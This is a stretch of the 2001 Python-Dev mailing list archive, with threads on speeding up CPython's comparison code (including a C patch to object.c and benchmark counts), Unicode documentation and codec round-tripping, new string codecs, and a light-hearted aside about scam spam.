Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one@home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji@fourthought.com  Tue May 15 05:26:31 2001
From: uche.ogbuji@fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com>
 of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was th only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji@fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one@home.com  Tue May 15 07:28:34 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='��'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='��'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "���������������������������������"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='��' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='��'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 07:44:23 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I made a CVS update since
yesterday, I had to readjust the baseline results:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the case "equal types, supporting cmp" to somewhat
earlier, just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The change here is what you'd do when you have both richcmp and
oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead, except for
PyErr_Occurred call.

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one@home.com  Tue May 15 08:33:06 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like whar are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one@home.com  Tue May 15 08:47:16 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.


From mal@lemburg.com  Tue May 15 09:19:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Tue May 15 09:32:14 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by reverting
to the private Unicode char. point areas).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Tue May 15 10:26:32 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either make sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be-- provided we don't start stuffing code into *every* object's
tp_richcompare slot! --"no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot before I added it last week, and
because dicts can do a much faster and more-general job on Py_EQ and Py_NE
than dict cmp (but on nothing else).  I originally took away the tp_compare
slot for dicts and lived to regret it -- it has both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorator pattern ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).

more-measuring-less-guessing-ly y'rs  - tim


From thomas@xs4all.net  Tue May 15 12:51:06 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was th only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Tue May 15 13:10:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abc���".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abc���".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@pythonware.com  Tue May 15 13:11:26 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer this far: $155,000,000)


From guido@digicool.com  Tue May 15 16:27:31 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
 <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either make sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Tue May 15 16:29:10 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
 <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like whar are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the desciption of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido@digicool.com  Tue May 15 17:35:09 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
 <3B011CA8.9DDB4FC7@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an excercise, I added a quoted-printable codec.  It was easy
indeed!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Tue May 15 19:21:00 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas@python.ca  Tue May 15 19:51:20 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started download the whole .mov files.

  Neil


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 20:45:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome, but looking at the first byte
also had:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equal is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0                                                                          
That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim@digicool.com  Tue May 15 21:22:37 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
